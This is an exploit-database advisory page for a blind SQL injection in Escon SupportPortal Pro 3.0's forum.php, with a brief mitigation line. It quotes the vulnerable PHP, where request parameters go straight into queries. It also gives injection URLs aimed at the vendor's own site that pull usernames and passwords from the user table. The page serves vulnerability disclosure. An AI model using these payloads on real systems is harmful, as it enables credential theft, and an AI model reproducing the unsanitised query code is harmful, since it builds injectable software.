header-logo
Suggest Exploit
vendor:
Escon SupportPortal Pro
by:
OzX
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Escon SupportPortal Pro
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:escon_supportportal:escon_supportportal_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Blind SQL Injection in Escon SupportPortal Pro 3.0

A Blind SQL Injection vulnerability exists in Escon SupportPortal Pro 3.0. The vulnerable parameter is 'cat' and 'tid' in the 'forum.php' file. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerable code is located on lines 60-71 of the 'forum.php' file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in database queries.
Source

Exploit-DB raw data:

Autor : OzX
Sitio : Foro.Undersecurity.net

Cms :  Escon SupportPortal Pro
Version : 3.0
Sitio: http://www.e-supportportal.com

Tipo Vulnz : Blind Sql Injection
Archivo : forum.php
Parametro Vulnerable 1 : cat
Parametro Vulnerable 2 : tid

Source Vulnz (forum.php):

60 -    if($_REQUEST["a"]=="rss"){
61 -        $cat=$_REQUEST["cat"];
62 -        $tid=$_REQUEST["tid"];
63 -        header('Content-type: application/rss+xml');
64 - 
65 -      $app_url=trim(dlookup("app_url","site","sid=$sid"),"/")."/";
66 -
67 -
68 -  if(isset($_REQUEST['tid']))
69 -     $r=dlookup_row("select * from fr where sid=$sid and id=$tid");
70 -  else {$r=dlookup_row("select * from fr_cat where sid=$sid and id=$cat");$tid=0;}
71 -  echo "<?xml version=\"1.0\" ?>";


Ejemplo:
http://www.site.comforum.php?a=rss&cat=[SQLI]&tid=[SQLI]

Otros:

Usuario :
ttp://www.e-supportportal.com/app/forum.php?cat=6&tid=33+and+(select+uname+from+usr+limit+0,1)

PassWord :
http://www.e-supportportal.com/app/forum.php?cat=6&tid=33+and+(select+upwd+from+usr+limit+0,1)

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.


Site Referer : http://foro.undersecurity.net/read.php?16,1971,1971#msg-1971

# milw0rm.com [2009-06-01]

Navigation

Suggest Exploit

Services By CQR